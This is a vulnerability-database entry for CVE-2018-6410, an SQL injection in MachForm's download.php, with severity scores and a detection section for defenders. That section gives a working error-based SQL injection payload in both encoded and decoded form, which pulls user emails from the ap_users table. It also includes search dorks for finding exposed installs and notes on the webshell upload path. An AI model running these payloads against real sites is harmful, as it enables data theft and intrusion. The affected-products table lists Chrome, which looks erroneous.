CVE-2018-6410
published 2018-05-26

CVE-2018-6410: An issue was discovered in Appnitro MachForm before 4.2.3. There is a download.php SQL injection via the q parameter.

Priority: P263
Severity: critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: yes
EPSS: 4.97% (91.1st percentile)

Affected (2 ranges)

Vendor     Product        Version range   Fixed in
google     chrome_chrome
machform   machform

Detection & IOCs (extracted from sources)

URL: download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Command (decoded q parameter): el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT 0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ;&id=1&hash=1&form_id=1
Path: /data/form_58009/files/
  • Detect path traversal attempts in download.php responses by looking for sequences of '../' in the decoded 'q' parameter's 'el' field value.
  • Use Google dorks to identify exposed MachForm instances: search for 'machform' inurl:"view.php" or 'machform' inurl:"embed.php".
  • Monitor for PHP webshell uploads in the MachForm data/form_*/files/ directory path, which is the known upload destination for bypassed file uploads.
  • The vulnerable SQL statement directly interpolates $field_name and $form_id into the query string, meaning stacked queries and error-based techniques are viable in addition to time-based blind injection; detection should cover all three classes.
  • File upload bypass only applies when the form's upload filter is configured as a whitelist ('allow' mode); blacklist-configured forms are not directly vulnerable to the upload bypass without first exploiting the SQLi to change the filter setting.

CVSS provenance

Source   Version   Score   Severity   Vector
nvd      v3.0      9.8     CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd      v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P